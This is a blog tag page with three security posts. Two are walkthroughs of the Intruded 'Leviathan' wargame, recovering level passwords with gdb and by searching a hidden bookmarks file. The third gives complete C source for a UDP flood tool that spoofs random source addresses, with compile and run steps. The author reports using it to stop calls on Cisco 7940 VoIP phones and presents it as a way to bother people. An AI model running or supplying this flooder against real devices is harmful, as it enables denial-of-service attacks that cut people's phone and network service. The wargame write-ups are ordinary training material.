Posts tagged hack

Intruded Nº4

0
618 jours
by in Linux, OS, Security

For the 4th one, we remeber that there was a program called
« level4″ in the /wargame folder, let’s go to it.

first run :

level4@leviathan:/wargame$ ./level4
Enter the password> lol
bzzzzzzzzap. WRONG
level4@leviathan:/wargame$

interesting .. it looks like the 2 challenge, let’s disassemble the main part : 

(gdb) disassemble main
Dump of assembler code for function main:
0x08048523 :	lea    0x4(%esp),%ecx
0x08048527 :	and    $0xfffffff0,%esp
0x0804852a :	pushl  0xfffffffc(%ecx)
0x0804852d :	push   %ebp
0x0804852e :	mov    %esp,%ebp
0x08048530 :	push   %ecx
0x08048531 :	sub    $0x44,%esp
0x08048534 :	mov    0x8048757,%eax
0x08048539 :	mov    %eax,0xfffffff1(%ebp)
0x0804853c :	movzwl 0x804875b,%eax
0x08048543 :	mov    %ax,0xfffffff5(%ebp)
0x08048547 :	movzbl 0x804875d,%eax
0x0804854e :	mov    %al,0xfffffff7(%ebp)
0x08048551 :	mov    0x804875e,%eax
0x08048556 :	mov    %eax,0xffffffe7(%ebp)
0x08048559 :	mov    0x8048762,%eax
0x0804855e :	mov    %eax,0xffffffeb(%ebp)
0x08048561 :	movzwl 0x8048766,%eax
0x08048568 :	mov    %ax,0xffffffef(%ebp)
0x0804856c :	mov    0x8048768,%eax
0x08048571 :	mov    %eax,0xffffffe0(%ebp)
0x08048574 :	movzwl 0x804876c,%eax
0x0804857b :	mov    %ax,0xffffffe4(%ebp)
0x0804857f :	movzbl 0x804876e,%eax
0x08048586 :	mov    %al,0xffffffe6(%ebp)
0x08048589 :	mov    0x804876f,%eax
0x0804858e :	mov    %eax,0xffffffd9(%ebp)
0x08048591 :	movzwl 0x8048773,%eax
0x08048598 :	mov    %ax,0xffffffdd(%ebp)
0x0804859c :	movzbl 0x8048775,%eax
0x080485a3 :	mov    %al,0xffffffdf(%ebp)
0x080485a6 :	mov    0x8048776,%eax
0x080485ab :	mov    %eax,0xffffffcf(%ebp)
0x080485ae :	mov    0x804877a,%eax
0x080485b3 :	mov    %eax,0xffffffd3(%ebp)
0x080485b6 :	movzwl 0x804877e,%eax
0x080485bd :	mov    %ax,0xffffffd7(%ebp)
0x080485c1 :	lea    0xffffffd9(%ebp),%eax
0x080485c4 :	mov    %eax,0x4(%esp)
0x080485c8 :	lea    0xffffffe0(%ebp),%eax
0x080485cb :	mov    %eax,(%esp)
0x080485ce :	call   0x804835c 
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de 
0x080485d7 :	movl   $0x1,0xfffffff8(%ebp)
0x080485de :	movl   $0x8048742,(%esp)
0x080485e5 :	call   0x80483bc

0x080485ea :	call   0x8048484 
0x080485ef :	add    $0x44,%esp
0x080485f2 :	pop    %ecx
0x080485f3 :	pop    %ebp
0x080485f4 :	lea    0xfffffffc(%ecx),%esp
0x080485f7 :	ret
---Type  to continue, or q  to quit---q
Quit

Again, we can take the interesting part :

0x080485ce :	call   0x804835c 
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de

let’s make a break point on it, and run it until it ask the password : 

reakpoint 1 at 0x804835c
(gdb) r
Starting program: /wargame/level4 

Breakpoint 1, 0x0804835c in strcmp@plt ()
(gdb) s
Single stepping until exit from function strcmp@plt,
which has no line number information.
0xb7f1eec0 in strcmp () from /lib/tls/i686/cmov/libc.so.6
(gdb) s
Single stepping until exit from function strcmp,
which has no line number information.
0x080485d3 in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
Enter the password> test

/!\ there is an interesting thing, I had to push 3 times « s » to arrive to my break point
( I should analyse this, anyway let’s continue ) /!\

let’s see what’s happening when we analyse $esp 

(gdb) x/2x $esp
0xbffff8bc:	0x080484e6	0xbffff8dd
(gdb) x/s 0xbffff8dd
0xbffff8dd:	 "test\n"

Ok, we got our password back, so, let’s go a bit further

(gdb) x/3x $esp
0xbffff8bc: 0x080484e6 0xbffff8dd 0xbffff9dd
(gdb) x/s 0xbffff9dd
0xbffff9dd: « snlprintf\n »
(gdb)

ok .. here there is a little trick "snlprintf" is the password we are searching for,
they just put a " C " name as string. the clue is "\n" at the end of snlprintf ;)

let's try the password :

level4@leviathan:/wargame$ ./level4
Enter the password> snlprintf
[You've got shell]!
sh-3.1$

yeah let's go to the next lvl ;)

Intruded nº1

0
619 jours
by in Linux, OS, Security

Today I tried the Intruded Leviathan wargame ( the first levels ),

I will explain how to resolve them easily.

Let’s try the first one.

  1. open a terminal
  2. type « ssh level1@leviathan.intruded.net -p 10101″
  3. type the password  leviathan

and then you should get something like this :

*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level1@leviathan.intruded.net's password:
Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686

Now that we are connected, we should try the first command to see

ls -a = to list the folders even the hidden one

level1@leviathan:~$ ls -a
.  ..  .backup  .bash_history  .bash_logout  .bash_profile  .bashrc  .passwd

Hmmm there is a « backup » folder hidden, let’s enter in it, and list it.

level1@leviathan:~$ cd ./.backup
level1@leviathan:~/.backup$ ls -a
bookmarks.html

Ok, bookmarks let’s see if there are some « passwords »

level1@leviathan:~/.backup$ cat ./bookmarks.html |grep pass
<DT><A HREF="http://nahtaivel.intruded.net/passwordus.html" TEMP: "AFeSdWEf"ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to level2</A>
level1@leviathan:~/.backup$

Easy … we got it

let’s meet at the next level :)

UDP Flooder in C

0
737 jours
by in Linux, Networking, OS, Security

Yesterday we where still working on some attacks on our  bench test  and we tried some exploit on the phones
that we found on the internet. Most of them where making some DDOS on the phone but they also blocked them
this means that when people will try to phone … they will discover the phone freezing … then i made up with my
friend some modifications on some code that I had from a few years ago in C a UDP flooder.

This is sending UDP on random ports to a specific address with a random source  … and only working on linux.
the code help us to stop the connection between the 2 phones.
The one is trying to reach the other one … but the other one is too busy to answer all the « pings » and send them
to random addresses that he cannot answer.

We also discovered that when the connection between the 2 phones is established the phone
is not affected.

here his the code.

#include <stdio.h> // printf/fprintf
#include <stdlib.h>
#include <string.h> 

#include <netinet/ip.h> // struct ip
#include <sys/socket.h> // socket()
#include <netinet/in.h> // struct sockadd

#define __FAVOR_BSD
#define _USE_BSD
#include <netinet/udp.h> // struct udp

#define PADDING_SIZE 1
#define N_LOOP 10
#define U_WAITING 100000 

void udp(char *);
unsigned short int in_chksum (unsigned short int *, int);
unsigned long hasard(unsigned long, unsigned long);

main() {
srand(time(NULL));
int i;

for(i=0;i<N_LOOP;i++)
 {
 udp("xxx.xxx.xxx.xxx");
 usleep(U_WAITING);
 printf("-");    
 udp("xxx.xxx.xxx.xxx");
 usleep(U_WAITING);
 printf("+");
 }
}

void udp(char *cible) {

int sd;
sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sd == -1) {
fprintf(stderr,"socket() error, root ?\n");
}

unsigned long ip_src = hasard(4294967295/2,4294967295);
unsigned long ip_dst = inet_addr(cible);
unsigned short p_src = (unsigned short) hasard(0,65535);
unsigned short p_dst = (unsigned short) hasard(0,65535);

struct sockaddr_in sin;

sin.sin_family = AF_INET;
sin.sin_port = p_dst;
sin.sin_addr.s_addr = ip_dst; // dst

struct ip *ip;
struct udphdr *udp;
char *dgm, *data;

int pksize = sizeof(struct ip) + sizeof(struct udphdr) + PADDING_SIZE;
dgm = (char *) malloc(pksize);
ip = (struct ip *) dgm;
udp = (struct udphdr *) (dgm + sizeof(struct ip));
data = (char *) (dgm + sizeof(struct ip) + sizeof(struct udphdr));

memset(dgm, 0, pksize);
memcpy((char *) data, "G", PADDING_SIZE);

int un = 1;
if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&un, sizeof(un)) == -1)
 {
 fprintf(stderr,"setsockopt()");
 exit(-1);
 }

//entete ip

ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = sizeof(pksize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = sizeof( 45 );
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0; // a remplir aprés
ip->ip_src.s_addr = ip_src;
ip->ip_dst.s_addr = ip_dst;

//entete udp

udp->uh_sport = p_src;
udp->uh_dport = p_dst;
udp->uh_ulen = htons(sizeof(struct udphdr ) + PADDING_SIZE);
udp->uh_sum = 0;

// envoi
if (sendto(sd, dgm, pksize, 0, (struct sockaddr *) &sin,
 sizeof(struct sockaddr)) == -1) {
 fprintf(stderr,"oops, sendto() error\n");
 }

//libere la memoire
free(dgm);
close(sd);
}

u_short in_chksum (u_short *addr, int len) // taken from papasmurf.c
{
 register int nleft = len;
 register u_short *w = addr;
 register int sum = 0;
 u_short answer = 0;

 while (nleft > 1)
 {
 sum += *w++;
 nleft -= 2;
 }

 if (nleft == 1)
 {
 *(u_char *)(&answer) = *(u_char *)w;
 sum += answer;
 }

 sum = (sum >> 16) + (sum + 0xffff);
 sum += (sum >> 16);
 answer = ~sum;
 return(answer);
}

unsigned long hasard(unsigned long min, unsigned long max){
return (u_long) (min + ((float) rand() / RAND_MAX * (max - min + 1)));
}

this is quiet good working to border people without affecting the phone.
you can easily compile it with the following command :

gcc -o udp udp.c

and run it with

./udp

if everything is working you should see

+-+-+-

this is appearing during the running time.

we tested it on 7940 phones from cisco and it was good working … soon we will publish some new code.

Have fun.

Get Adobe Flash playerPlugin by wpburn.com wordpress themes
Go to Top